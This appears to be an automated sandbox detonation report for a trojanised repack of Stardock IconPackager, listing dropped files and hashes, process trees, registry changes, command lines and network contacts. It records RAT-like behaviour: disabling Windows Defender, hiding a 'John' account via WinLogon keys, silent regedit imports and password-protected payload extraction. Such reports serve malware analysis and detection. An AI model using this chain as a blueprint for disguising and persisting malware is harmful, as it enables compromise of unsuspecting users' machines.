C:\ProgramData\Microsoft\Intel\P.exe

MD5 80768034f4a195f201b01422f1b6c310
SHA1 9a8f65886dae029d5afa5bd0be50cb620ff5e768
SHA256 cae22eeb4beace20d36d722bd5b5524ab4f20d1d58f1946ec5f9dd7d36ff4d13
SHA512 f0ab8d7f7189bd30e68f24c6c873fe2c918071b31c019c12e1a3ba28326da6dd82041aa51ac1018269a15fa85c973d345d1d28ba84d1a3b4c7092e02f998ea69

memory/1984-140-0x0000000000000000-mapping.dmp

C:\programdata\microsoft\intel\P.exe

MD5 80768034f4a195f201b01422f1b6c310
SHA1 9a8f65886dae029d5afa5bd0be50cb620ff5e768
SHA256 cae22eeb4beace20d36d722bd5b5524ab4f20d1d58f1946ec5f9dd7d36ff4d13
SHA512 f0ab8d7f7189bd30e68f24c6c873fe2c918071b31c019c12e1a3ba28326da6dd82041aa51ac1018269a15fa85c973d345d1d28ba84d1a3b4c7092e02f998ea69

\ProgramData\Microsoft\Intel\P.exe

MD5 80768034f4a195f201b01422f1b6c310
SHA1 9a8f65886dae029d5afa5bd0be50cb620ff5e768
SHA256 cae22eeb4beace20d36d722bd5b5524ab4f20d1d58f1946ec5f9dd7d36ff4d13
SHA512 f0ab8d7f7189bd30e68f24c6c873fe2c918071b31c019c12e1a3ba28326da6dd82041aa51ac1018269a15fa85c973d345d1d28ba84d1a3b4c7092e02f998ea69

memory/904-142-0x0000000000000000-mapping.dmp

memory/1292-137-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1292-146-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1292-145-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1292-143-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1292-147-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1156-148-0x0000000000000000-mapping.dmp

memory/872-149-0x0000000000000000-mapping.dmp

memory/896-150-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

C:\Programdata\Microsoft\rootsystem\P.vbs

MD5 7bff6ae169103f2027bc9f07406ce6be
SHA1 732a9b9611092ea716413c9d84ae125e1a3ac80d
SHA256 5ac0b01e8bc76232283737470931e693c95ef785cabca5fdde0d0ae5b3625739
SHA512 da99e3fbb54abaa1db3c0f399d4d44ae15f7ac3616decad5c7894e119c4ec1dc33376f7c818acafa70f18943e865e54cd2d988c80845e9f40ea74882e94dd309

memory/956-155-0x0000000000000000-mapping.dmp

memory/2004-156-0x0000000000000000-mapping.dmp

memory/924-157-0x0000000000400000-0x0000000000AB9000-memory.dmp

\ProgramData\Microsoft\rootsystem\1.exe

MD5 622610a2cc797a4a41f5b212aa98bde0
SHA1 bfe47dce0d55df24aa5b6d59c442cf85c618176e
SHA256 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2
SHA512 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b

memory/1136-161-0x0000000000000000-mapping.dmp

memory/1972-162-0x0000000000000000-mapping.dmp

C:\Programdata\Microsoft\rootsystem\1.exe

MD5 622610a2cc797a4a41f5b212aa98bde0
SHA1 bfe47dce0d55df24aa5b6d59c442cf85c618176e
SHA256 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2
SHA512 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b

\ProgramData\Microsoft\rootsystem\1.exe

MD5 622610a2cc797a4a41f5b212aa98bde0
SHA1 bfe47dce0d55df24aa5b6d59c442cf85c618176e
SHA256 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2
SHA512 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b

C:\ProgramData\Microsoft\rootsystem\1.exe

MD5 622610a2cc797a4a41f5b212aa98bde0
SHA1 bfe47dce0d55df24aa5b6d59c442cf85c618176e
SHA256 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2
SHA512 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b

memory/1772-165-0x0000000000000000-mapping.dmp

memory/840-166-0x0000000000000000-mapping.dmp

memory/736-167-0x0000000000000000-mapping.dmp

memory/1652-168-0x0000000000000000-mapping.dmp

memory/768-170-0x0000000000000000-mapping.dmp

memory/1832-169-0x0000000000000000-mapping.dmp

memory/956-171-0x0000000000000000-mapping.dmp

memory/1680-172-0x0000000000000000-mapping.dmp

memory/1004-173-0x0000000000000000-mapping.dmp

memory/1604-174-0x0000000000000000-mapping.dmp

memory/392-175-0x0000000000000000-mapping.dmp

memory/2028-176-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

memory/940-178-0x0000000000000000-mapping.dmp

memory/1652-179-0x0000000000000000-mapping.dmp

memory/1948-180-0x0000000000000000-mapping.dmp

memory/868-181-0x0000000000000000-mapping.dmp

memory/1480-182-0x0000000000000000-mapping.dmp

memory/872-183-0x0000000000000000-mapping.dmp

memory/1684-184-0x0000000000000000-mapping.dmp

memory/1500-185-0x0000000000000000-mapping.dmp

memory/1764-186-0x0000000000000000-mapping.dmp

memory/948-187-0x0000000000000000-mapping.dmp

memory/1348-188-0x0000000000000000-mapping.dmp

memory/1320-189-0x0000000000000000-mapping.dmp

memory/800-190-0x0000000000000000-mapping.dmp

memory/1096-191-0x0000000000000000-mapping.dmp

memory/572-192-0x0000000000000000-mapping.dmp

memory/1652-193-0x0000000000000000-mapping.dmp

memory/2040-194-0x0000000000000000-mapping.dmp

memory/1272-196-0x0000000000000000-mapping.dmp

memory/852-195-0x0000000000000000-mapping.dmp

memory/556-198-0x0000000000000000-mapping.dmp

memory/1680-197-0x0000000000000000-mapping.dmp

memory/1152-199-0x0000000000000000-mapping.dmp

memory/1580-200-0x0000000000000000-mapping.dmp

memory/432-201-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\rootsystem\Log.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/1576-203-0x0000000000000000-mapping.dmp

memory/764-204-0x0000000000000000-mapping.dmp

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Programdata\Install\del.bat

MD5 398a9ce9f398761d4fe45928111a9e18
SHA1 caa84e9626433fec567089a17f9bcca9f8380e62
SHA256 e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA512 45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

\ProgramData\RealtekHD\taskhost.exe

MD5 e561bf827e929c3121f0b9002592bdde
SHA1 c05819883b09c1abf3e3ecef66262a85b6ee032d
SHA256 c565157f345b50acf4763d9e603ce379e1e349e4483ead7635b0fd420eb252fd
SHA512 04675daacf6a336ef698c51dd8788623011675ca113a1321c54b5306c4046eda99e8df920fec8323b5d47361fca5ddf91445a815865ec87fd18e6da8c0ac6470

C:\ProgramData\RealtekHD\taskhost.exe

MD5 e561bf827e929c3121f0b9002592bdde
SHA1 c05819883b09c1abf3e3ecef66262a85b6ee032d
SHA256 c565157f345b50acf4763d9e603ce379e1e349e4483ead7635b0fd420eb252fd
SHA512 04675daacf6a336ef698c51dd8788623011675ca113a1321c54b5306c4046eda99e8df920fec8323b5d47361fca5ddf91445a815865ec87fd18e6da8c0ac6470

C:\programdata\microsoft\temp\H.bat

MD5 62d538047d3ed87445df44ea681dfac0
SHA1 7b89c29ce6640349ef5b65d5e8520f2e0e4dd9a8
SHA256 ed966b4e4603d8f1d6f686e01e7c8ed91117b90a2318869d93bafd00ba20cffd
SHA512 0e83e1eb8f4278be52a32fc7b3d28cbff0fe024395e8bc02c2771f3d1bf612136e28671de3f9932bdfdaf1e9d2d2e1b33f1c95ad8bd6b15484cb4723b6a9e918

memory/1972-215-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

C:\Programdata\RealtekHD\taskhost.exe

MD5 e561bf827e929c3121f0b9002592bdde
SHA1 c05819883b09c1abf3e3ecef66262a85b6ee032d
SHA256 c565157f345b50acf4763d9e603ce379e1e349e4483ead7635b0fd420eb252fd
SHA512 04675daacf6a336ef698c51dd8788623011675ca113a1321c54b5306c4046eda99e8df920fec8323b5d47361fca5ddf91445a815865ec87fd18e6da8c0ac6470

\ProgramData\RealtekHD\taskhostw.exe

MD5 4cd554c3e4ff642fd82d938b072d31d7
SHA1 a8a70a18a6f8e1b426599ded4385a2d4c386b571
SHA256 0d0b85d01ec49bcb0c4196015f4125a547315ecbb451ad1bd1d95a7ed875c482
SHA512 5f6f17921485916514c7298ae9c22c010a9e75eb28367a94327566a01c60d44d9a51192ec2dc6d1eecc985d80a941eed1e86c12a4e8e317c87cafb3a994592f2

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 335d4e5473fd07df439f38e87938c74b
SHA1 e1b619e6e98ae189edfe8143fc30fc33ccd47b35
SHA256 0f621d83705d5f2a512b3baa881bbb604ec5de03083e2a59a3ae491ea7d3562d
SHA512 ab22c1768ccd9958601b11a12629b246844760d1327255c3a4a02a37f37d49e7f335be6f78346b4ada92ece67fb7b04fb7760153c8730a40c9b635ae488a4dc0

C:\Programdata\RealtekHD\taskhostw.exe

MD5 c15ef98af883b30df7181715b8e57f90
SHA1 76e8a57fcd5e0bdee4917b80492c6cc548c567c0
SHA256 46a0060bb2672a423814e64770cef1070322336fb8b9ea21a4ffb0d5eb58dbb0
SHA512 063f7978d6553abfbf162bceab9d1cca9b124b1bc13f9a11f6dcbd588db084d39dc70bf1ebb9b4690ec8f715eeb45d60d2aea07de6ff5476c77c98a017763eb1

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:39

Platform

win10v2004-20220414-en

Max time kernel

164s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

RMS

trojan rat rms

Windows security bypass

evasion trojan

Blocks application from running via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3684 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 3684 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 3684 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin
PID 3684 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 3684 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 3684 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe
PID 3928 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 3928 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 3928 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin C:\ProgramData\Setup\update.exe
PID 4744 wrote to memory of 4580 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 4744 wrote to memory of 4580 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 4744 wrote to memory of 4580 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 4580 wrote to memory of 4084 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 4580 wrote to memory of 4084 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 4580 wrote to memory of 4084 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 4580 wrote to memory of 2412 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4580 wrote to memory of 2412 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4580 wrote to memory of 2412 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4084 wrote to memory of 4836 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 4836 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 4836 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 wrote to memory of 4484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4836 wrote to memory of 4484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4836 wrote to memory of 4484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4744 wrote to memory of 308 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 4744 wrote to memory of 308 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 4744 wrote to memory of 308 N/A C:\ProgramData\Setup\update.exe C:\programdata\install\cheat.exe
PID 4836 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4836 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4836 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Stardock IconPackager 5.10.032.exe"

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.bin -ptoptorrent

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\Repack.exe

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 13.89.178.27:443 tcp
NL 88.221.144.179:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 8.8.8.8:53 6.9.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.3.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa udp

Files

memory/3928-130-0x0000000000000000-mapping.dmp

memory/4592-131-0x0000000000000000-mapping.dmp

memory/4744-132-0x0000000000000000-mapping.dmp

C:\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

C:\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

memory/4580-135-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

memory/4084-138-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

memory/2412-139-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

memory/4836-144-0x0000000000000000-mapping.dmp

memory/4484-145-0x0000000000000000-mapping.dmp

C:\ProgramData\install\cheat.exe

MD5 56bf27304cf61f949f8842b8558ff2e3
SHA1 c52809302addbcd57000dc142ac4193460e91c6f
SHA256 3cc93cac7905c81a4419f328183e508c6742a359788043c7e3faba6e406795a4
SHA512 48aefb4b6fec6961dc8836686ad34aa8a4dd36720a09632e7a2fbc723c9132428d835c1630b06936a5065e2c79167bd4302c045d5f4ada7516660166708fa95e

memory/308-146-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg1.reg

MD5 4dc0fba4595ad8fe1f010f9079f59dd3
SHA1 b3a54e99afc124c64978d48afca2544d75e69da5
SHA256 b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512 fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8

C:\programdata\install\cheat.exe

MD5 ffb4918a5d12cb7ae2c77aa77853cfc1
SHA1 7271dde96598c1ea1f80fe22c0d1a91a1a140f22
SHA256 be4fca209d665da7360c50ad346e2c0bb30855d2ec1e70dea34c5809b6502b56
SHA512 6d85d44cc90af2fc049b59e45dd5cb57813944a4b1940d86da04afaa09c8030cdce3f7a0e4343f5dfe7e5868a6eabcc12695f5d9fe7f1fa7401808fbf1396d52

memory/3256-150-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Analysis: behavioral3

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win7-20220414-en

Max time kernel

11s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Network

N/A

Files

memory/1728-54-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win10v2004-20220414-en

Max time kernel

203s

Max time network

230s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data.exe"

Network

Country Destination Domain Proto
NL 104.97.14.81:80 tcp
NL 20.50.201.200:443 tcp
IE 20.54.110.249:443 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
NL 20.190.160.73:443 tcp
US 8.253.135.112:80 tcp
NL 20.190.160.67:443 tcp
US 8.253.135.112:80 tcp
NL 20.190.160.67:443 tcp
FR 2.18.109.224:443 tcp
NL 20.190.160.2:443 tcp
NL 20.190.160.2:443 tcp
NL 20.190.160.136:443 tcp
NL 20.190.160.136:443 tcp
NL 20.190.160.129:443 tcp
NL 20.190.160.129:443 tcp
NL 20.190.160.6:443 tcp
US 8.8.8.8:53 106.89.54.20.in-addr.arpa udp
NL 20.190.160.6:443 tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
NL 20.190.160.6:443 tcp
NL 20.190.160.8:443 tcp
NL 20.190.160.8:443 tcp
NL 20.190.160.8:443 tcp
NL 20.190.160.4:443 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2022-05-20 03:26

Reported

2022-05-20 03:40

Platform

win7-20220414-en

Max time kernel

147s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe

"C:\Users\Admin\AppData\Local\Temp\stardock_iconpackager_5.10\data0.exe"

Network

N/A

Files

memory/1064-54-0x00000000769D1000-0x00000000769D3000-memory.dmp